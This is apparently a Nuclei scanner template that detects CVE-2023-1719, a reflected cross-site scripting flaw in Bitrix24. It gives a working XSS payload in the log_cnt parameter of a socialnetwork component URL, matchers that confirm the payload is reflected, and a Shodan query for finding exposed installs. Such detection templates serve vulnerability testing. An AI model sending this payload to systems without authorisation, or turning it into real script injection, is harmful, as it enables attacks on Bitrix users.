2023-11-06 16:45:38 +00:00
id: CVE-2023-1719
info:
  name: Bitrix Component - Cross-Site Scripting
  author: DhiyaneshDk
  severity: high
  description: |
    Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.
  reference:
    - https://starlabs.sg/advisories/23/23-1719/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1719
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-1719
    cwe-id: CWE-665
    epss-score: 0.00248
    epss-percentile: 0.62517
  metadata:
    verified: true
    max-request: 1
    vendor: bitrix24
    product: bitrix24
    shodan-query: html:"/bitrix/"
  tags: cve,cve2023,bitrix,xss
http:
  - method: GET
    path:
      - "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'LOG_CNT':"
          - "<img onerror=alert(document.domain) src=1>"
        condition: and
      - type: word
        part: header
        words:
          - text/html
      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f54570076df2fbb61bb1838213d54ab8014e7840d27da79a639fac9b401ff7f002203da8ab467dc61a01c72f4f0f115a8d77632e23a6f8ea930bc999b5f77419f30e:922c64590222798bb761d5b6d8e72950